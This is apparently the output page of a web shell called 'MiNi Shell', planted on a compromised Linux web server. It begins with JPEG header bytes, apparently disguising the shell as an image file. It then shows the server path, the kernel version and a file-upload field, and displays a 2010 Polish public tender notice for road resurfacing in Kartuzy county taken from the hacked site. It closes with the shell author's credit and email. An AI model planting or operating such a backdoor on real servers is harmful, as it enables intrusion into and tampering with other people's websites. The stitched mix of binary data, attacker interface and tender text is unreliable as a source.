JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100616/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100616/155613-N-2010.html

<p class="kh_header"><b>Kartuzy: WYKONANIE  ODNOWY  DYWANIKOWEJ  WRAZ  Z BUDOWĄ  ODCINKA  CHODNIKA  I  KOREKTĄ  PARAMETRÓW SKRZYŻOWANIA  Z UL. SPACEROWĄ   W CIĄGU  DROGI POWIATOWEJ   NR 1908G  NA ODCINKU  GARCZ- CHMIELNO</b><br>
<b>Numer ogłoszenia: 155613 - 2010; data zamieszczenia: 16.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Kartuzach , ul. Gdańska 26, 83-300 Kartuzy, woj. pomorskie, tel. 058 6810715, faks 058 6811522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zdp.kartuzy.ibip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://zdp.kartuzy.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE  ODNOWY  DYWANIKOWEJ  WRAZ  Z BUDOWĄ  ODCINKA  CHODNIKA  I  KOREKTĄ  PARAMETRÓW SKRZYŻOWANIA  Z UL. SPACEROWĄ   W CIĄGU  DROGI POWIATOWEJ   NR 1908G  NA ODCINKU  GARCZ- CHMIELNO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : Wykonanie  odnowy dywanikowej  wraz  z budową  odcinka  chodnika  i  korektą  parametrów skrzyżowania  z ul. Spacerową   w ciągu drogi powiatowej   nr 1908G  na odcinku Garcz- Chmielno3.2.	Wykonanie robót obejmuje następujące zadania:
a)oznakowanie miejsca robót wg projektu oznakowania i organizacji robót  wraz  z harmonogramem planowanych robót, które  należy przedłożyć do akceptacji tut. Zarządowi  Dróg,
b)  planowany  zakres robót 
Lp	Wyszczególnienie robót	Jedn.   miary	Ilość
                           Wykonanie   chodnika 
1	Roboty pomiarowe przy odtworzeniu trasy chodnika 	km
0,147
2	Rozbiórka betonowego fundamentu płotu i schodów betonowych z utylizacją materiału z rozbiórki	m3	6,5
3	Ustawienie krawężnika betonowego 15 x 30 x 100 wystającego wraz z wykonaniem rowka pod ławę betonową i wykonaniem ławy z betonu B-15 z oporem 	m	108,0
4	Ustawienie krawężnika betonowego najazdowego 15 x 22 x 100 na zjazdach wraz z wykonaniem rowka pod ławę betonową i wykonaniem ławy z betonu B-15 z oporem 	m	39,0
5	Ustawienie krawężnika betonowego wtopionego 12,5 x  25 na zakończeniu zjazdów wraz z wykonaniem rowka pod ławę betonową i wykonaniem ławy z betonu B-15 z oporem 	m	28,0
6	Ustawienie obrzeża chodnikowego betonowego 8 x 30 wystającego 4 cm wraz z wykonaniem rowka pod ławę piaskową i wykonaniem ławy z piasku grub. 10 cm	m	119,0
7	Wykonanie koryta pod chodnik i zjazdy głębokości średnio 25 cm w gruncie III kat.  z odwiezieniem urobku na odkład do 2 km	m2	197,0
8	Ułożenie chodnika z kostki betonowej POLBRUK kolor szary + 20% kolor czerwony) grub. 6 cm na podbudowie z podsypki cementowo-piaskowej 1:4 grub. 10 cm wraz z uzupełnieniem podłoża z pospółki grubości 10 cm 	m2	143,0
9	Wykonanie zjazdów z kostki betonowej POLBRUK ( koloru grafit )  grub. 8 cm na podbudowie z podsypki cementowo-piaskowej 1:4 grub. 15 cm wraz z uzupełnieniem podłoża z pospółki grubości 10 cm 	m2	54,0
10	Wykonanie studni rewizyjnych o 1000 mm z osadnikiem głębokości 2,0 m wraz z wykonaniem wykopów pod studnie, ułożeniem płyty pod studziennej i pokrywy żelbetowej z włazem typu średniego 	szt	3,0
11	Wykonanie studzienek wpadowych o 500 mm z osadnikiem głębokości 1,5 m wraz z wykonaniem wykopów pod studzienki i ustawieniem kratek wpadowych 	szt	3,0
12	Wykonanie kolektora o 200 mm na podsypce piaskowej grubości 15 cm wraz z wykonaniem wykopów pod kolektor i jego zasypaniem gruntem przepuszczalnym 	m	65,0
13	Wykonanie przy kanalików o 160 mm na podsypce piaskowej grubości 15 cm wraz z wykonaniem wykopów pod przykanaliki i jego zasypaniem gruntem przepuszczalnym 	m	3,0
14	Wykonanie umocnienia skarpy w miejscu rozbiórki fundamentu płotu płytami betonowymi ażurowymi MEBA 60 x 40 x 10 cm 	m2	25,0
15

	Uporządkowanie terenu w sąsiedztwie chodnika poprzez profilowanie terenu, zahumusowanie i obsianie humusu trawą 	m2	60,0
                    Odnowa  nawierzchni
16	Frezowanie lokalnych nierówności istniejącej nawierzchni 	m2	500
17	Odtworzenie konstrukcji nawierzchni poprzez sfrezowanie naw .bitumicznej, rozbiórkę istniejącej podbudowy, wykonanie koryta głębokości 40 cm, wykonanie warstwy odcinającej grub. 20 cm, wykonanie podbudowy z kruszywa kamiennego stabilizowanego mechanicznie grub. 20 cm, wykonanie warstwy wiążącej z betonu asfaltowego grub. 4 cm	m2	200
18	Remont cząstkowy nawierzchni masą asfaltową na gorąco 	m2	300
19 	Wykonanie wyrównania istniejącej nawierzchni masą asfaltową w ilości 50 kg/m2	Mg	399
20	Wykonanie warstwy ścieralnej z betonu asfaltowego grub. 4 cm	m2	7974
          Korekta  parametrów  skrzyżowania  z ul. Spacerową 
			
21	Rozbiórka krawężnika betonowego 15x30 	m	95
22	Rozbiórka nawierzchni bitumicznej grub. 6 cm	m2	101
23	Rozbiórka podbudowy tłuczniowej grub. 15 cm 	m2	101
24	Rozbiórka studni rewizyjnej kanalizacji deszczowej	szt	1
25	Rozbiórka studzienki wpadowej 	szt	1
26	Wywóz materiałów z rozbiórki wraz z utylizacją 	m3	27,5
			
27	Ustawienie wystającego 12 cm krawężnika betonowego 15x30x100 na ławie betonowej z betonu B-15 z oporem wraz z wykonaniem rowka pod ławę betonową  i wykonaniem ławy 	m	63
28	Ustawienie wtopionego opornika betonowego 12,5x25x100 na ławie betonowej z betonu B-15 zwykłej wraz z wykonaniem rowka pod ławę betonową i wykonaniem ławy 	m	18
29	Wykonanie koryta pod konstrukcję nawierzchni  głębokości 44 cm w gruncie III kat.  z odwiezieniem urobku na odkład do 2 km - uzupełnienie nawierzchni po wyspie	m2	44,0
30	Wykonanie warstwy odcinającej grub. 20 cm - uzupełnienie po wyspie	m2	44,0
31	Wykonanie podbudowy z kruszywa kamiennego stabilizowanego mechanicznie grub. 20 cm - uzupełnienie po wyspie	m2	44,0
32	Wykonanie warstwy wiążącej z betonu asfaltowego grub. 4 cm  - uzupełnienie po wyspie	m2	44,0
33	Wykonanie studni rewizyjnych o 1000 mm z osadnikiem głębokości 1,5 m wraz z wykonaniem wykopów pod studnie, ułożeniem płyty podstudziennej i pokrywy żelbetowej z włazem typu średniego 	szt	1,0
34	Wykonanie studzienek wpadowych o 500 mm z osadnikiem głębokości 1,5 m wraz z wykonaniem wykopów pod studzienki i ustawieniem kratek wpadowych 	szt	2,0
35	Wykonanie przykanalików o 160 mm na podsypce piaskowej grubości 15 cm wraz z wykonaniem wykopów pod przykanaliki i jego zasypaniem gruntem przepuszczalnym 	m	17,0
36	Wykonanie wybruku na prawoskręcie z ulicy Spacerowej z kostki granitowej 14 x 14 cm na podbudowie z betonu B-15 z wypełnieniem spoin zaprawą cementową 	m2	32,0
37	Ustawienie oznakowania pionowego - słupek + tarcze znaków - A-7 i D-1	szt	3
38	Wykonanie oznakowania poziomego na włączeniu ul. Spacerowej                                                                      P-4 (20+15) m * 0,24                                                                            P-1e  -  5 m  * 0,12                                                                         P-10  -  4,5 m * 0,5                                                                                 	m2	11,3
39	Uporządkowanie terenu w sąsiedztwie skrzyżowania poprzez profilowanie terenu, humusowanie 5 cm i obsianie humusu trawą 	m2	80,0.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówienia uzupełniającego na podstawie art. 67 ust.1 pkt 6 ustawy Pzp w ilości  do 50% przedmiotowego zamówienia w zakresie robót określonych w pkt.II.1.3.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.22-1, 45.23.31.41-9, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferent przystępując do przetargu nie wnosi wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny (nie dalej niż 6 miesięcy przed terminem składania) odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działania wykonawcy odpowiada przedmiotowi zamówienia- ocena  na podstawie   złożonego  odpisu  lub zaświadczenia .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Doswiadczenie  zawodowe:Zrealizował jako główny wykonawca w okresie ostatnich 5 lat, co najmniej dwa zadania o charakterze i złożoności porównywalnej z zakresem opisanego  zamówienia. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń złożonych przez wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał sprzętowy:Posiadać lub mieć zapewniony dostęp do w pełni sprawnego sprzętu tj. samochód samowyładowczy, frezarka drogowa,  walec stalowy min. 12,5 ton, walec ogumiony, rozkładarka mas bitumicznych, beczkowóz, szczotka mechaniczna, sprężarka powietrza,  skrapiarka, piła do cięcia asfaltu i betonu, wibracyjne zagęszczarki gruntu szt.2, zestaw bezprzewodowej sygnalizacji świetlnej do wahadłowego prowadzenia ruchu).
Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń złożonych przez wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał  kadrowy:Mieć do dyspozycji odpowiednio wykwalifikowany personel, zdolny do wykonania przedmiotu zamówienia, w tym posiadający wymagane uprawnienia do wykonywania w/w robót (kierownik robót, robotnicy drogowi min. 6 osób, brukarze-2 osoby, kierowca, operatorzy walców drogowych min. 2 osoby, operatorzy rozkładarki mas i frezarki drogowej ). Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń złożonych przez wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja finansowa:Mieć dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji robót przez okres 1 miesiąca, oszacowanymi na sumę 150000,00zł bez uwzględnienia zobowiązań z tytułu realizacji innych zamówień.Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń złożonych przez wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie  dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje  możliwość  zmiany  postanowień  zawartych  w umowie, przez    sporządzenie  aneksu  w zakresie :
   - terminu realizacji robót 
   - zakresu robót
   - oraz pozostałych  warunków  umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zdp.kartuzy.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZARZĄD DRÓG POWIATOWYCH
W KARTUZACH
83-300 KARTUZY UL. GDAŃSKA 26
pok.26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2010 godzina 10:45, miejsce: ZARZĄD DRÓG POWIATOWYCH
W KARTUZACH
83-300 KARTUZY UL. GDAŃSKA 26
pok.26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com